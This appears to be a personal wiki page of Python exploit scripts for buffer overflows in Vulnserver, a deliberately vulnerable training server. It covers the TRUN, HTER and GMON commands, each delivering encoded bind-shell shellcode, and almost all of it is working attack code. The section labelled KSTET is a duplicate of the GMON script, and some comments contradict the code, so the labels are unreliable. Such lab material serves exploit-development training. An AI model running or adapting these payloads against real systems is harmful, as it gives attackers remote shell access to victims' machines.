Vulnberable Server


TRUN Exploit

   1 #!/usr/bin/env python
   2 # -*- coding: utf-8 -*-
   3 # Name: trun-exploit-vs.tmpl
   4 # Author: Dirk <dirk@fake.mx>
   5 # Kind of Exploit: Simple Bufferoverflow
   6 # This Exploit aims at TRUN command from the vurnable server
   7 # http://www.thegreycorner.com/2010/12/introducing-vulnserver.html
   8 # Tested on WinXP SP3 
   9 # =================================================================================================#
  10 # Vurnable commands: GTER at 320bytes; KSTET at 220bytes; HTER at 2220bytes (looks most promising) #
  11 # Badcharacters : \x00, \x0A \x0D                                                                  #
  12 # =================================================================================================#
  13 #
  14 # Howto calculate the right place for you shellcode!
  15 # Calculating the position where we should place our final section of shellcode is actually quite simple.
  16 # Since we are jumping backwards 768 bytes from the end of the CALL statement at the end of our small block of
  17 # shellcode, we simply need to subtract 768, less the length of the data between the end of the small shellcode
  18 # and the end of the block of INT3 instructions, from the value we used for the size of the block of INT3
  19 # instructions.
  20 
  21 # The data between the end of the INT3 instructions and the end of the small shellcode is 22 bytes in length. Subtracted
  22 # from 768, this makes 746. My value for the size of the INT 3 block of characters (determined when we ran pattern_offset
  23 # earlier) was 3498. Subtracting 746 from 3498 makes 2752. If you received a different value from the pattern_offset program
  24 # earlier, please make sure you subtract 746 from this value to determine where your shellcode will start.
  25 
  26 import socket,sys,time,struct
  27 
  28 
  29 #----------------------------------------------------------------------------------#
  30 # msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -b '\x00\x0A\x0D' -t c #
  31 # [*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)                     #
  32 #----------------------------------------------------------------------------------#
  33 
  34 evil = "A" * 2004 # Pattern offset at 2004 bytes
  35 evil += struct.pack("<L", 0x625011AF) #"\xEF\xBE\xAD\xDE" # struct.pack("L", 0x625011AF)
  36 evil += "\x90" * 16
  37 #evil += "\xCC" * 4 # For debugging purposes just disable to test the exploit
  38 evil +=  ("\x33\xc9\x83\xe9\xaa\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
  39           "\xbb\xc1\x9c\x35\x83\xee\xfc\xe2\xf4\x47\x29\x15\x35\xbb\xc1"
  40           "\xfc\xbc\x5e\xf0\x4e\x51\x30\x93\xac\xbe\xe9\xcd\x17\x67\xaf"
  41           "\x4a\xee\x1d\xb4\x76\xd6\x13\x8a\x3e\xad\xf5\x17\xfd\xfd\x49"
  42           "\xb9\xed\xbc\xf4\x74\xcc\x9d\xf2\x59\x31\xce\x62\x30\x93\x8c"
  43           "\xbe\xf9\xfd\x9d\xe5\x30\x81\xe4\xb0\x7b\xb5\xd6\x34\x6b\x91"
  44           "\x17\x7d\xa3\x4a\xc4\x15\xba\x12\x7f\x09\xf2\x4a\xa8\xbe\xba"
  45           "\x17\xad\xca\x8a\x01\x30\xf4\x74\xcc\x9d\xf2\x83\x21\xe9\xc1"
  46           "\xb8\xbc\x64\x0e\xc6\xe5\xe9\xd7\xe3\x4a\xc4\x11\xba\x12\xfa"#Shellcode Bing Shell LPORT=4444
  47           "\xbe\xb7\x8a\x17\x6d\xa7\xc0\x4f\xbe\xbf\x4a\x9d\xe5\x32\x85"
  48           "\xb8\x11\xe0\x9a\xfd\x6c\xe1\x90\x63\xd5\xe3\x9e\xc6\xbe\xa9"
  49           "\x2a\x1a\x68\xd3\xf2\xae\x35\xbb\xa9\xeb\x46\x89\x9e\xc8\x5d"
  50           "\xf7\xb6\xba\x32\x44\x14\x24\xa5\xba\xc1\x9c\x1c\x7f\x95\xcc"
  51           "\x5d\x92\x41\xf7\x35\x44\x14\xcc\x65\xeb\x91\xdc\x65\xfb\x91"
  52           "\xf4\xdf\xb4\x1e\x7c\xca\x6e\x48\x5b\x04\x60\x92\xf4\x37\xbb"
  53           "\xd0\xc0\xbc\x5d\xab\x8c\x63\xec\xa9\x5e\xee\x8c\xa6\x63\xe0"
  54           "\xe8\x96\xf4\x82\x52\xf9\x63\xca\x6e\x92\xcf\x62\xd3\xb5\x70"
  55           "\x0e\x5a\x3e\x49\x62\x32\x06\xf4\x40\xd5\x8c\xfd\xca\x6e\xa9"
  56           "\xff\x58\xdf\xc1\x15\xd6\xec\x96\xcb\x04\x4d\xab\x8e\x6c\xed"
  57           "\x23\x61\x53\x7c\x85\xb8\x09\xba\xc0\x11\x71\x9f\xd1\x5a\x35"
  58           "\xff\x95\xcc\x63\xed\x97\xda\x63\xf5\x97\xca\x66\xed\xa9\xe5"
  59           "\xf9\x84\x47\x63\xe0\x32\x21\xd2\x63\xfd\x3e\xac\x5d\xb3\x46"
  60           "\x81\x55\x44\x14\x27\xc5\x0e\x63\xca\x5d\x1d\x54\x21\xa8\x44"
  61           "\x14\xa0\x33\xc7\xcb\x1c\xce\x5b\xb4\x99\x8e\xfc\xd2\xee\x5a"
  62           "\xd1\xc1\xcf\xca\x6e\xc1\x9c\x35")
  63 evil += "\xCC" * (3000 - len(evil))
  64 
  65 
  66 if len(sys.argv) < 3:
  67     print "Missing arguments for host and port"
  68 else:
  69     s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  70     connect=s.connect((str(sys.argv[1]),int(sys.argv[2])))
  71     try:
  72         s.send("TRUN . /%s\r\n" % evil) # !!!! Change Server Command
  73         s.close
  74         ##################################################
  75         so=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  76         connect=so.connect((str(sys.argv[1]),int(sys.argv[2])))
  77         time.sleep(1)
  78         so.close # Now crash?
  79         ##################################################
  80     except:
  81         print "[-]ERROR"
  82         sys.exit(-1)


HTER Exploit

   1 #!/usr/bin/env python
   2 # -*- coding: utf-8 -*-
   3 # Name: exploit-vs.tmpl
   4 # Author: Dirk <dirk@fake.mx>
   5 # This Exploit aims at the TRUN command from the vurnable server
   6 # http://www.thegreycorner.com/2010/12/introducing-vulnserver.html
   7 #
   8 # =================================================================================================#
   9 # Vurnable commands: HTER                                                                          #
  10 # Badcharacters : \x00, \x0A \x0D                                                                  #
  11 # =================================================================================================#
  12 #
  13 
  14 import socket,sys,time,struct
  15 
  16 #----------------------------------------------------------------------------------#
  17 # msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -b '\x00\x0A\x0D' -t c #
  18 # [*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)                     #
  19 #----------------------------------------------------------------------------------#
  20 
  21 
  22 
  23 evil = "A" * 2620 # Pattern offset # Calculated the offset at exactly 1024 bytes
  24 evil += "\xAF\x11\x50\x62" * 8 # EIP override 0x62501203 625011AF
  25 # Can't remember if the shellcode was valid
  26 
  27 evil +=  ("\x33\xc9\x83\xe9\xaa\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
  28           "\xbb\xc1\x9c\x35\x83\xee\xfc\xe2\xf4\x47\x29\x15\x35\xbb\xc1"
  29           "\xfc\xbc\x5e\xf0\x4e\x51\x30\x93\xac\xbe\xe9\xcd\x17\x67\xaf"
  30           "\x4a\xee\x1d\xb4\x76\xd6\x13\x8a\x3e\xad\xf5\x17\xfd\xfd\x49"
  31           "\xb9\xed\xbc\xf4\x74\xcc\x9d\xf2\x59\x31\xce\x62\x30\x93\x8c"
  32           "\xbe\xf9\xfd\x9d\xe5\x30\x81\xe4\xb0\x7b\xb5\xd6\x34\x6b\x91"
  33           "\x17\x7d\xa3\x4a\xc4\x15\xba\x12\x7f\x09\xf2\x4a\xa8\xbe\xba"
  34           "\x17\xad\xca\x8a\x01\x30\xf4\x74\xcc\x9d\xf2\x83\x21\xe9\xc1"
  35           "\xb8\xbc\x64\x0e\xc6\xe5\xe9\xd7\xe3\x4a\xc4\x11\xba\x12\xfa"#Shellcode Bing Shell LPORT=4444
  36           "\xbe\xb7\x8a\x17\x6d\xa7\xc0\x4f\xbe\xbf\x4a\x9d\xe5\x32\x85"
  37           "\xb8\x11\xe0\x9a\xfd\x6c\xe1\x90\x63\xd5\xe3\x9e\xc6\xbe\xa9"
  38           "\x2a\x1a\x68\xd3\xf2\xae\x35\xbb\xa9\xeb\x46\x89\x9e\xc8\x5d"
  39           "\xf7\xb6\xba\x32\x44\x14\x24\xa5\xba\xc1\x9c\x1c\x7f\x95\xcc"
  40           "\x5d\x92\x41\xf7\x35\x44\x14\xcc\x65\xeb\x91\xdc\x65\xfb\x91"
  41           "\xf4\xdf\xb4\x1e\x7c\xca\x6e\x48\x5b\x04\x60\x92\xf4\x37\xbb"
  42           "\xd0\xc0\xbc\x5d\xab\x8c\x63\xec\xa9\x5e\xee\x8c\xa6\x63\xe0"
  43           "\xe8\x96\xf4\x82\x52\xf9\x63\xca\x6e\x92\xcf\x62\xd3\xb5\x70"
  44           "\x0e\x5a\x3e\x49\x62\x32\x06\xf4\x40\xd5\x8c\xfd\xca\x6e\xa9"
  45           "\xff\x58\xdf\xc1\x15\xd6\xec\x96\xcb\x04\x4d\xab\x8e\x6c\xed"
  46           "\x23\x61\x53\x7c\x85\xb8\x09\xba\xc0\x11\x71\x9f\xd1\x5a\x35"
  47           "\xff\x95\xcc\x63\xed\x97\xda\x63\xf5\x97\xca\x66\xed\xa9\xe5"
  48           "\xf9\x84\x47\x63\xe0\x32\x21\xd2\x63\xfd\x3e\xac\x5d\xb3\x46"
  49           "\x81\x55\x44\x14\x27\xc5\x0e\x63\xca\x5d\x1d\x54\x21\xa8\x44"
  50           "\x14\xa0\x33\xc7\xcb\x1c\xce\x5b\xb4\x99\x8e\xfc\xd2\xee\x5a"
  51           "\xd1\xc1\xcf\xca\x6e\xc1\x9c\x35")
  52 evil += "C" * (2620-len(evil))
  53 
  54 
  55 
  56 
  57 if len(sys.argv) < 3:
  58     print "Missing arguments for host and port"
  59 else:
  60     s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  61     connect=s.connect((str(sys.argv[1]),int(sys.argv[2])))
  62     try:
  63         s.send("HTER /%s\r\n" % evil) # !!!! Change Server Command
  64         s.close
  65         ##################################################
  66         so=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  67         connect=so.connect((str(sys.argv[1]),int(sys.argv[2])))
  68         time.sleep(1)
  69         so.close # Now crash?
  70         ##################################################
  71     except:
  72         print "[-]ERROR"
  73         sys.exit(-1)


GMON Exploit

   1 #!/usr/bin/env python
   2 # -*- coding: utf-8 -*-
   3 # Name: gmon-exploit-vs.py
   4 # Author: Dirk <dirk@fake.mx>
   5 # Kind of Exploit: SEH based Bufferoverflow
   6 # This Exploit aims at the GMON command from the vurnable server
   7 # http://www.thegreycorner.com/2010/12/introducing-vulnserver.html
   8 # Plattform: WinXP SP3
   9 # =================================================================================================#
  10 # Vurnable commands: GTER at 320bytes; KSTET at 220bytes; HTER at 2220bytes (looks most promising) #
  11 # Badcharacters : \x00, \x0A \x0D                                                                  #
  12 # =================================================================================================#
  13 
  14 
  15 import socket,sys,time,struct
  16 
  17 #----------------------------------------------------------------------------------#
  18 # msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -b '\x00\x0A\x0D' -t c #
  19 # [*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)                     #
  20 #----------------------------------------------------------------------------------#
  21 
  22 evil = "\xCC" * 2752 # Pattern offset
  23 evil += "\x90" * 16 # Space sometimes needed to get the shellcode working
  24 evil +=  ("\x33\xc9\x83\xe9\xaa\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
  25          "\xbb\xc1\x9c\x35\x83\xee\xfc\xe2\xf4\x47\x29\x15\x35\xbb\xc1"
  26          "\xfc\xbc\x5e\xf0\x4e\x51\x30\x93\xac\xbe\xe9\xcd\x17\x67\xaf"
  27          "\x4a\xee\x1d\xb4\x76\xd6\x13\x8a\x3e\xad\xf5\x17\xfd\xfd\x49"
  28          "\xb9\xed\xbc\xf4\x74\xcc\x9d\xf2\x59\x31\xce\x62\x30\x93\x8c"
  29          "\xbe\xf9\xfd\x9d\xe5\x30\x81\xe4\xb0\x7b\xb5\xd6\x34\x6b\x91"
  30          "\x17\x7d\xa3\x4a\xc4\x15\xba\x12\x7f\x09\xf2\x4a\xa8\xbe\xba"
  31          "\x17\xad\xca\x8a\x01\x30\xf4\x74\xcc\x9d\xf2\x83\x21\xe9\xc1"
  32          "\xb8\xbc\x64\x0e\xc6\xe5\xe9\xd7\xe3\x4a\xc4\x11\xba\x12\xfa"#Shellcode Bing Shell LPORT=4444
  33          "\xbe\xb7\x8a\x17\x6d\xa7\xc0\x4f\xbe\xbf\x4a\x9d\xe5\x32\x85"
  34          "\xb8\x11\xe0\x9a\xfd\x6c\xe1\x90\x63\xd5\xe3\x9e\xc6\xbe\xa9"
  35          "\x2a\x1a\x68\xd3\xf2\xae\x35\xbb\xa9\xeb\x46\x89\x9e\xc8\x5d"
  36          "\xf7\xb6\xba\x32\x44\x14\x24\xa5\xba\xc1\x9c\x1c\x7f\x95\xcc"
  37          "\x5d\x92\x41\xf7\x35\x44\x14\xcc\x65\xeb\x91\xdc\x65\xfb\x91"
  38          "\xf4\xdf\xb4\x1e\x7c\xca\x6e\x48\x5b\x04\x60\x92\xf4\x37\xbb"
  39          "\xd0\xc0\xbc\x5d\xab\x8c\x63\xec\xa9\x5e\xee\x8c\xa6\x63\xe0"
  40          "\xe8\x96\xf4\x82\x52\xf9\x63\xca\x6e\x92\xcf\x62\xd3\xb5\x70"
  41          "\x0e\x5a\x3e\x49\x62\x32\x06\xf4\x40\xd5\x8c\xfd\xca\x6e\xa9"
  42          "\xff\x58\xdf\xc1\x15\xd6\xec\x96\xcb\x04\x4d\xab\x8e\x6c\xed"
  43          "\x23\x61\x53\x7c\x85\xb8\x09\xba\xc0\x11\x71\x9f\xd1\x5a\x35"
  44          "\xff\x95\xcc\x63\xed\x97\xda\x63\xf5\x97\xca\x66\xed\xa9\xe5"
  45          "\xf9\x84\x47\x63\xe0\x32\x21\xd2\x63\xfd\x3e\xac\x5d\xb3\x46"
  46          "\x81\x55\x44\x14\x27\xc5\x0e\x63\xca\x5d\x1d\x54\x21\xa8\x44"
  47          "\x14\xa0\x33\xc7\xcb\x1c\xce\x5b\xb4\x99\x8e\xfc\xd2\xee\x5a"
  48          "\xd1\xc1\xcf\xca\x6e\xc1\x9c\x35")
  49 evil += "\x90" * (3498 -len(evil)) # data after SEH Handler
  50 evil += "\xEB\x0F\x90\x90" # Pointer to Next-SEH
  51 evil += struct.pack("<L", 0x625010B4) # SEH override POP POP RETN
  52 evil += "\x59\xFE\xCD\xFE\xCD\xFE\xCD\xFF\xE1\xE8\xF2\xFF\xFF\xFF"
  53 evil += "\x90" * (4000 -len(evil)) #
  54 
  55 
  56 if len(sys.argv) < 3:
  57     print "Missing arguments for host and port"
  58 else:
  59     s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  60     connect=s.connect((str(sys.argv[1]),int(sys.argv[2])))
  61     try:
  62         s.send("GMON /%s\r\n" % evil)
  63         s.close
  64         ##################################################
  65         so=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  66         connect=so.connect((str(sys.argv[1]),int(sys.argv[2])))
  67         time.sleep(1)
  68         so.close # Now crash?
  69         ##################################################
  70     except:
  71         print "[-]ERROR"
  72         sys.exit(-1)


KSTET Exploit

   1 #!/usr/bin/env python
   2 # -*- coding: utf-8 -*-
   3 # Name: gmon-exploit-vs.py
   4 # Author: Dirk <dirk@fake.mx>
   5 # Kind of Exploit: SEH based Bufferoverflow
   6 # This Exploit aims at the GMON command from the vurnable server
   7 # http://www.thegreycorner.com/2010/12/introducing-vulnserver.html
   8 # Plattform: WinXP SP3
   9 # =================================================================================================#
  10 # Vurnable commands: GTER at 320bytes; KSTET at 220bytes; HTER at 2220bytes (looks most promising) #
  11 # Badcharacters : \x00, \x0A \x0D                                                                  #
  12 # =================================================================================================#
  13 
  14 import socket,sys,time,struct
  15 
  16 #----------------------------------------------------------------------------------#
  17 # msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -b '\x00\x0A\x0D' -t c #
  18 # [*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)                     #
  19 #----------------------------------------------------------------------------------#
  20 
  21 evil = "\xCC" * 2752 # Pattern offset
  22 evil += "\x90" * 16 # Space sometimes needed to get the shellcode working
  23 evil +=  ("\x33\xc9\x83\xe9\xaa\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
  24          "\xbb\xc1\x9c\x35\x83\xee\xfc\xe2\xf4\x47\x29\x15\x35\xbb\xc1"
  25          "\xfc\xbc\x5e\xf0\x4e\x51\x30\x93\xac\xbe\xe9\xcd\x17\x67\xaf"
  26          "\x4a\xee\x1d\xb4\x76\xd6\x13\x8a\x3e\xad\xf5\x17\xfd\xfd\x49"
  27          "\xb9\xed\xbc\xf4\x74\xcc\x9d\xf2\x59\x31\xce\x62\x30\x93\x8c"
  28          "\xbe\xf9\xfd\x9d\xe5\x30\x81\xe4\xb0\x7b\xb5\xd6\x34\x6b\x91"
  29          "\x17\x7d\xa3\x4a\xc4\x15\xba\x12\x7f\x09\xf2\x4a\xa8\xbe\xba"
  30          "\x17\xad\xca\x8a\x01\x30\xf4\x74\xcc\x9d\xf2\x83\x21\xe9\xc1"
  31          "\xb8\xbc\x64\x0e\xc6\xe5\xe9\xd7\xe3\x4a\xc4\x11\xba\x12\xfa"#Shellcode Bing Shell LPORT=4444
  32          "\xbe\xb7\x8a\x17\x6d\xa7\xc0\x4f\xbe\xbf\x4a\x9d\xe5\x32\x85"
  33          "\xb8\x11\xe0\x9a\xfd\x6c\xe1\x90\x63\xd5\xe3\x9e\xc6\xbe\xa9"
  34          "\x2a\x1a\x68\xd3\xf2\xae\x35\xbb\xa9\xeb\x46\x89\x9e\xc8\x5d"
  35          "\xf7\xb6\xba\x32\x44\x14\x24\xa5\xba\xc1\x9c\x1c\x7f\x95\xcc"
  36          "\x5d\x92\x41\xf7\x35\x44\x14\xcc\x65\xeb\x91\xdc\x65\xfb\x91"
  37          "\xf4\xdf\xb4\x1e\x7c\xca\x6e\x48\x5b\x04\x60\x92\xf4\x37\xbb"
  38          "\xd0\xc0\xbc\x5d\xab\x8c\x63\xec\xa9\x5e\xee\x8c\xa6\x63\xe0"
  39          "\xe8\x96\xf4\x82\x52\xf9\x63\xca\x6e\x92\xcf\x62\xd3\xb5\x70"
  40          "\x0e\x5a\x3e\x49\x62\x32\x06\xf4\x40\xd5\x8c\xfd\xca\x6e\xa9"
  41          "\xff\x58\xdf\xc1\x15\xd6\xec\x96\xcb\x04\x4d\xab\x8e\x6c\xed"
  42          "\x23\x61\x53\x7c\x85\xb8\x09\xba\xc0\x11\x71\x9f\xd1\x5a\x35"
  43          "\xff\x95\xcc\x63\xed\x97\xda\x63\xf5\x97\xca\x66\xed\xa9\xe5"
  44          "\xf9\x84\x47\x63\xe0\x32\x21\xd2\x63\xfd\x3e\xac\x5d\xb3\x46"
  45          "\x81\x55\x44\x14\x27\xc5\x0e\x63\xca\x5d\x1d\x54\x21\xa8\x44"
  46          "\x14\xa0\x33\xc7\xcb\x1c\xce\x5b\xb4\x99\x8e\xfc\xd2\xee\x5a"
  47          "\xd1\xc1\xcf\xca\x6e\xc1\x9c\x35")
  48 evil += "\x90" * (3498 -len(evil)) # data after SEH Handler
  49 evil += "\xEB\x0F\x90\x90" # Pointer to Next-SEH
  50 evil += struct.pack("<L", 0x625010B4) # SEH override POP POP RETN
  51 evil += "\x59\xFE\xCD\xFE\xCD\xFE\xCD\xFF\xE1\xE8\xF2\xFF\xFF\xFF"
  52 evil += "\x90" * (4000 -len(evil)) #
  53 
  54 
  55 if len(sys.argv) < 3:
  56     print "Missing arguments for host and port"
  57 else:
  58     s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  59     connect=s.connect((str(sys.argv[1]),int(sys.argv[2])))
  60     try:
  61         s.send("GMON /%s\r\n" % evil)
  62         s.close
  63         ##################################################
  64         so=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  65         connect=so.connect((str(sys.argv[1]),int(sys.argv[2])))
  66         time.sleep(1)
  67         so.close # Now crash?
  68         ##################################################
  69     except:
  70         print "[-]ERROR"
  71         sys.exit(-1)


vuln_server (zuletzt geändert am 2016-12-02 19:28:30 durch Dirk)